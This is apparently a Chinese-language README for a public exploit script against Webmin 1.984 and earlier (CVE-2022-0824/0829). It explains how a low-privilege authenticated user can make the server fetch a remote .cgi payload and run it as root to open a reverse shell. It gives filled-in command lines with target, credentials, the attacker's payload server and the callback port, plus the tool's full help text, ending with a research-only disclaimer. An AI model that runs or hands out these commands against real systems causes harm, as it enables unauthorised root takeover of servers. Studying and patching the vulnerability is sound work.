Webmin 1.984 及以下版本 - 文件管理器权限利用漏洞(CVE-2022-0824 和 CVE-2022-0829)
在默认使用 Authentic 主题的情况下,仅拥有较低权限且未配置任何文件管理器模块限制的 Webmin 用户,可访问具有 root 权限的文件。所有包含不受信任的 Webmin 用户的系统应立即升级。请注意,Virtualmin 系统不受此漏洞影响,因为其域所有者 Webmin 用户的配置方式不同。
来源:https://www.webmin.com/security.html
此漏洞利用文件管理器中的后认证不当访问控制漏洞。任何拥有较低权限的已认证攻击者均可利用该漏洞。它会从攻击者控制的远程服务器下载一个 .cgi 文件,并将其权限修改为全局可执行文件。完成后,将执行该 .cgi 文件,以 root 权限建立与攻击者控制服务器的反向连接。
参考链接:https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/
$~ python3 Webmin-revshell.py -t [TARGET] -c [CREDENTIAL] -LS [PY3HTTP_SERVER] -L [CALLBACK_IP] -P [CALLBACK_PORT]
$~ python3 Webmin-revshell.py -t https://192.168.5.118:10000 -c user:user123 -LS 192.168.5.120:9090 -L 192.168.5.120 -P 4444
$~ python3 Webmin-revshell.py -h
usage: Webmin-revshell.py [-h] -t TARGET -c CREDENTIAL -LS PY3HTTP_SERVER -L CALLBACK_IP -P CALLBACK_PORT [-V]
Webmin CVE-2022-0824 Reverse Shell
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
Target full URL, https://www.webmin.local:10000
-c CREDENTIAL, --credential CREDENTIAL
Format, user:user123
-LS PY3HTTP_SERVER, --py3http_server PY3HTTP_SERVER
Http server for serving payload, ex 192.168.5.120:8080
-L CALLBACK_IP, --callback_ip CALLBACK_IP
Callback IP to receive revshell
-P CALLBACK_PORT, --callback_port CALLBACK_PORT
Callback port to receive revshell
-V, --version show program's version number and exit
目标主机:https://192.168.5.118:10000
攻击者主机:192.168.5.120
- Webmin 1.984
- Ubuntu 18.04
- Kali 2021.3
该脚本仅供安全分析和研究使用,因此如果被用于非法活动,本人概不负责。